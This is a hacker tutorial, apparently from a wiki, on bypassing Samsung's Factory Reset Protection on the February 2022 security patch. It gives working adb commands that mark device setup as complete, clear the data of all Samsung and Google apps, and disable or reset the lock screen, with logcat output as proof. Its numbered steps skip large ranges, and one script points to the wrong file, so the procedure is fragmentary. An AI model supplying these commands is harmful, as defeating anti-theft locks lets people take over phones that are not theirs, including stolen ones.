No worries, I've got you covered with a newer version (they are fast but not fast enough, so I decided to share this wiki with the public). This hack works perfectly for all Samsung devices with the latest security patch (2022-02-01). While the wiki was created on February 21, 2022, it still works awesomely. Please note that this method does NOT work on Android 11. If you have an Android 11 FRP locked device, you can upgrade to the latest firmware from Samsung.
I'm sharing this information freely because it's fun and because I can, and because I believe it's enjoyable to share knowledge. I never report exploits or security issues for money. For me, time is more valuable than money.
20) Browse to Nr1.
- Now, via
adb
, execute the following command on your device:
content insert --uri content://settings/secure \
--bind name:s:user_setup_complete \
--bind value:s:1
- For those interested in a deeper understanding, the logcat provides the following information:
02-20 23:25:40.306 936 8470 D RestrictionPolicy: isSettingsChangesAllowedAsUser, userId 0: true
02-20 23:25:40.306 936 8470 D SettingsProvider: ret = 1
02-20 23:25:40.318 936 8470 I GenerationRegistry: mBackingStore.isClosed(): false
02-20 23:25:40.320 5655 5655 I AODSettingsHelper: content://settings/secure/user_setup_complete changed
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: mKey=user_setup_complete, mIntValue=1, mStringValue=null
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: onChange() COMPLETED elapsed= 2
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: **#### onSettingsValueChanged for content://settings/secure/user_setup_complete
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: **#### onSettingsValueChanged callbackList == null
02-20 23:25:40.323 936 1133 D PackageManager: SetupWizardFinished: true
02-20 23:25:40.323 17664 17664 D hw-ProcessState: Binder ioctl to enable oneway spam detection failed: Invalid argument
02-20 23:25:40.325 17664 17664 D AndroidRuntime: Shutting down VM
02-20 23:25:40.344 5655 5655 I AODSettingsHelper: content://settings/secure/user_setup_complete changed
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: mKey=user_setup_complete, mIntValue=1, mStringValue=null
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: onChange() COMPLETED elapsed= 1
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: **#### onSettingsValueChanged for content://settings/secure/user_setup_complete
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: **#### onSettingsValueChanged callbackList == null
02-20 23:25:40.346 5655 5655 D DeviceProvisionedControllerImpl: Setting change: content://settings/secure/user_set
- As you may notice, you are now signed in.
!!! alert "IT'S NOT DONE!!! DON'T JUST RUSH INTO A FACTORY RESET OR SOMETHING, CONTINUE READING..."
56) You can now press next
, accept license and policies
, and wifi
should already be fixed, so press next. Now, you will see... nothing.
62) Say Google Assistant
. When Bixby launches, press volume up
+ power
to turn off Talkback settings.
64) Go to the "Apps" section, which has been locked all the time until we added our Google account. You probably already tried opening the Settings application, and it crashed. But now it's unlocked.
67) Select One UI Home
, and when you press on it, System UI
will launch, bypassing the earlier setup wizard.
-
You have just hacked Samsung's latest security patch, and there are a thousand reasons why I do not use cell phones ;)
-
Since adb shell is still open, clear all Samsung applications so we can take control over lock settings without any brute-forcing:
cmd package list packages \
| cut -d: -f2 \
| egrep samsung > /storage/self/primary/clear.txt
sed 's/^/pm clear --user 0 /g' /storage/self/primary/clear.txt \
> /storage/self/primary/clear_script.sh
sh -x /storage/self/primary/clear_script.sh
cmd package list packages \
| cut -d: -f2 \
| egrep google > /storage/self/primary/clear_google_apps.txt
sed 's/^/pm clear --user 0 /g' /storage/self/primary/clear.txt \
> /storage/self/primary/clear_google_apps.sh
sh -x /storage/self/primary/clear_script.sh
Your lock settings are NOT disabled if you are using an FRP locked device. However, you can confirm this with the following command:
cmd lock_settings get-disabled
cmd lock_settings is the new way we used locksettings in the past (you probably saw my wbruter script, which is very old and slow nowadays, use cmd instead). And since lock_settings was introduced in cmd, we can simply use the following command to disable the lock screen without any hacking:
cmd lock_settings set-disabled true
Since we still love ADB and prefer working in the command-line interface (CLI) rather than the GUI (Graphical User Interface), let's proceed with the following steps:
cmd locksettings --set-pin XXXX XXX
For GUI enthusiasts, you can open the settings and browse to "Biometrics and Security" either with the command below or through your home screen:
am start -a android.settings.SETTINGS
Congratulations! You have successfully hacked the latest Security Patch from Samsung (2022-02-01).
This tutorial is licensed under the GNU General Public License v3.0. Please refer to the LICENSE.md file for details. Feel free to copy this wiki, but if you do, please share the URL to this original post. Thank you!
Happy hacking, and never give up!